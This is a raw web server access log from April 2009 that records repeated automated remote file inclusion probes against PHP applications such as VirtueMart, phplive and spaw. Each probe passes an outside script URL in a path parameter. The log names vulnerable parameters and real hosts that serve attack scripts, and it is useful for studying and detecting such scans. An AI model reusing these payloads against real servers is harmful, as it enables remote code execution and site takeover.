83.138.168.158 - - [09/Apr/2009:07:42:57 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:42:57 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:42:57 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:42:57 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:00 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:00 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
209.90.77.57 - - [09/Apr/2009:07:43:09 -0500] "GET /logs/access_log.1232150400//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:15 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:15 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:19 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:23 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:23 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:23 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.126.12.7 - - [09/Apr/2009:07:43:50 -0500] "GET /logs//phplive/setup/header.php?css_path=http://www.classicline.ru/cfe2faece98f606043f1594d8677f722/alba.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
121.126.12.7 - - [09/Apr/2009:07:43:51 -0500] "GET //phplive/setup/header.php?css_path=http://www.classicline.ru/cfe2faece98f606043f1594d8677f722/alba.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
83.138.168.158 - - [09/Apr/2009:07:43:59 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:59 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:59 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:59 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:59 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:59 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:59 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:43:59 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:44:03 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:44:03 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:44:03 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:44:03 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:46:50 -0500] "GET //?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:46:50 -0500] "GET /logs/access_log.1232150400//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:46:59 -0500] "GET /logs//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 200 184870 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:47:02 -0500] "GET //?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:47:03 -0500] "GET /logs/access_log.1232150400//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:47:09 -0500] "GET /logs//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 200 184870 "-""Mozilla/5.0"
206.55.119.150 - - [09/Apr/2009:07:48:32 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://pinky.caucasus.net/VID.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
206.55.119.150 - - [09/Apr/2009:07:48:32 -0500] "GET //index.php?DOCUMENT_ROOT=http://pinky.caucasus.net/VID.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.151.241.1 - - [09/Apr/2009:07:49:54 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.151.241.1 - - [09/Apr/2009:07:49:54 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.151.241.1 - - [09/Apr/2009:07:49:54 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:51:40 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:51:40 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:51:40 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:51:43 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:51:43 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:51:43 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:51:52 -0500] "GET //?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:51:52 -0500] "GET //?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:51:56 -0500] "GET /logs/access_log.1236902400//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:51:56 -0500] "GET /logs/access_log.1236902400//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
198.106.204.186 - - [09/Apr/2009:07:52:04 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 326 "-""Mozilla/5.0"
198.106.204.186 - - [09/Apr/2009:07:52:04 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 321 "-""Mozilla/5.0"
198.106.204.186 - - [09/Apr/2009:07:52:04 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 348 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:52:07 -0500] "GET /logs//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 200 184870 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:52:08 -0500] "GET /logs//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 200 184870 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:52:15 -0500] "GET /logs/access_log.1232150400//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.48.108.111 - - [09/Apr/2009:07:52:21 -0500] "GET /logs/access_log.1232150400//?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:54:04 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:54:04 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:54:04 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:54:04 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:54:06 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
83.138.168.158 - - [09/Apr/2009:07:54:06 -0500] "GET /logs/access_log.1236729600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.155.232.37 - - [09/Apr/2009:07:58:39 -0500] "GET /logs/errors.php?error=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
195.155.232.37 - - [09/Apr/2009:07:58:39 -0500] "GET /errors.php?error=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
77.221.130.22 - - [09/Apr/2009:08:05:08 -0500] "GET //include/admin.lib.inc.php?site_path=http://harasin.0catch.com/fx29id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.22 - - [09/Apr/2009:08:05:08 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://harasin.0catch.com/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.22 - - [09/Apr/2009:08:05:08 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://harasin.0catch.com/fx29id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.221.130.17 - - [09/Apr/2009:08:05:12 -0500] "GET //include/admin.lib.inc.php?site_path=http://harasin.0catch.com/fx29id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.17 - - [09/Apr/2009:08:05:12 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://harasin.0catch.com/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.208.141 - - [09/Apr/2009:08:05:13 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:08:05:13 -0500] "GET /logs/access_log.1194134400 HTTP/1.1" 200 5600 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
77.221.130.17 - - [09/Apr/2009:08:05:15 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://harasin.0catch.com/fx29id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.221.130.22 - - [09/Apr/2009:08:05:18 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://harasin.0catch.com/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.17 - - [09/Apr/2009:08:05:18 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://harasin.0catch.com/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.98.1.242 - - [09/Apr/2009:08:05:39 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.813"
208.98.1.242 - - [09/Apr/2009:08:05:39 -0500] "GET //skin/zero_vote/error.php?dir=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.813"
212.97.132.101 - - [09/Apr/2009:08:11:13 -0500] "GET /?DOCUMENT_ROOT=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.0" 200 3233 "-""libwww-perl/5.53"
212.97.132.101 - - [09/Apr/2009:08:11:14 -0500] "GET /logs/?DOCUMENT_ROOT=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.0" 200 184538 "-""libwww-perl/5.53"
195.155.232.37 - - [09/Apr/2009:08:14:11 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
195.155.232.37 - - [09/Apr/2009:08:14:12 -0500] "GET //appserv/main.php?appserv_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
208.98.1.156 - - [09/Apr/2009:08:17:26 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://208.98.22.241/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
208.98.1.156 - - [09/Apr/2009:08:17:26 -0500] "GET //skin/zero_vote/error.php?dir=http://208.98.22.241/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
65.55.208.131 - - [09/Apr/2009:08:19:12 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [09/Apr/2009:08:19:12 -0500] "GET /logs/access_log.1150588800 HTTP/1.1" 200 1513 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
222.236.44.38 - - [09/Apr/2009:08:20:43 -0500] "GET /index.php?conteudo=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:08:20:43 -0500] "GET /logs/index.php?conteudo=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:08:20:43 -0500] "GET /logs/access_log.1238112000/index.php?conteudo=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
195.155.232.37 - - [09/Apr/2009:08:23:04 -0500] "GET //ashnews.php?pathtoashnews=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
195.155.232.37 - - [09/Apr/2009:08:23:04 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
77.221.130.5 - - [09/Apr/2009:08:26:43 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.221.130.5 - - [09/Apr/2009:08:26:44 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.221.130.5 - - [09/Apr/2009:08:26:44 -0500] "GET /logs/access_log.1236729600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
77.221.130.5 - - [09/Apr/2009:08:29:58 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
77.221.130.5 - - [09/Apr/2009:08:29:58 -0500] "GET /logs/access_log.1236729600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
77.221.130.5 - - [09/Apr/2009:08:29:58 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.98.1.242 - - [09/Apr/2009:08:32:11 -0500] "GET //login.php?dir=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
208.98.1.242 - - [09/Apr/2009:08:32:11 -0500] "GET /logs//login.php?dir=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
87.106.210.58 - - [09/Apr/2009:08:38:25 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
87.106.210.58 - - [09/Apr/2009:08:38:25 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.106.210.58 - - [09/Apr/2009:08:38:25 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.98.1.156 - - [09/Apr/2009:08:38:59 -0500] "GET /logs//login.php?dir=http://208.98.22.241/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
208.98.1.156 - - [09/Apr/2009:08:39:00 -0500] "GET //login.php?dir=http://208.98.22.241/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
128.241.54.67 - - [09/Apr/2009:08:47:54 -0500] "GET /logs/errors.php?error=http://www.classicline.ru/cfe2faece98f606043f1594d8677f722/alba.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
128.241.54.67 - - [09/Apr/2009:08:47:54 -0500] "GET /errors.php?error=http://www.classicline.ru/cfe2faece98f606043f1594d8677f722/alba.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
128.241.54.67 - - [09/Apr/2009:08:47:55 -0500] "GET /logs/errors.php?error=http://www.classicline.ru/cfe2faece98f606043f1594d8677f722/alba.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
128.241.54.67 - - [09/Apr/2009:08:47:55 -0500] "GET /errors.php?error=http://www.classicline.ru/cfe2faece98f606043f1594d8677f722/alba.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
94.23.4.143 - - [09/Apr/2009:08:54:21 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://googlelinux.altervista.org/id.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.4.143 - - [09/Apr/2009:08:54:21 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://googlelinux.altervista.org/id.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.4.143 - - [09/Apr/2009:08:54:31 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://googlelinux.altervista.org/id.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.4.143 - - [09/Apr/2009:08:54:31 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://googlelinux.altervista.org/id.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.4.143 - - [09/Apr/2009:08:54:37 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://googlelinux.altervista.org/id.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.23.4.143 - - [09/Apr/2009:08:54:37 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://googlelinux.altervista.org/id.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
82.119.205.130 - - [09/Apr/2009:08:56:19 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.119.205.130 - - [09/Apr/2009:08:56:19 -0500] "GET /logs/access_log.1235174400//admin/spaw/spaw_control.class.php?spaw_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.119.205.130 - - [09/Apr/2009:08:56:19 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.187.131.186 - - [09/Apr/2009:08:56:33 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.187.131.186 - - [09/Apr/2009:08:56:33 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.187.131.186 - - [09/Apr/2009:08:56:33 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
208.43.107.9 - - [09/Apr/2009:08:58:15 -0500] "GET //listener_graph.php//common/db.php?commonpath=http://mir-linux.ru/lang/test.txt?? HTTP/1.1" 404 317 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
217.195.192.40 - - [09/Apr/2009:08:59:05 -0500] "GET //listener_graph.php//common/db.php?commonpath=http://mir-linux.ru/lang/test.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
72.36.149.90 - - [09/Apr/2009:09:00:02 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.36.149.90 - - [09/Apr/2009:09:00:02 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.36.149.90 - - [09/Apr/2009:09:00:11 -0500] "GET /logs/access_log.1236470400//classes/adodbt/sql.php?classes_dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.36.149.90 - - [09/Apr/2009:09:00:12 -0500] "GET /logs/access_log.1236038400//classes/adodbt/sql.php?classes_dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
94.23.4.143 - - [09/Apr/2009:09:04:17 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://googlelinux.altervista.org/id.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
94.23.4.143 - - [09/Apr/2009:09:04:17 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://googlelinux.altervista.org/id.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
65.17.220.190 - - [09/Apr/2009:09:04:42 -0500] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.hrshe.ae/id.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
65.17.220.190 - - [09/Apr/2009:09:04:42 -0500] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.hrshe.ae/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
65.55.208.130 - - [09/Apr/2009:09:06:15 -0500] "GET /logs/access_log.1232409600 HTTP/1.1" 200 200173 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.149.231.93 - - [09/Apr/2009:09:12:33 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
82.149.231.93 - - [09/Apr/2009:09:12:33 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.nipservers.com/modules/Forums/admin/echo.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
89.188.110.43 - - [09/Apr/2009:09:13:55 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.imprex.co.kr/bbs//skin/happycast_blue/tek.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.825"
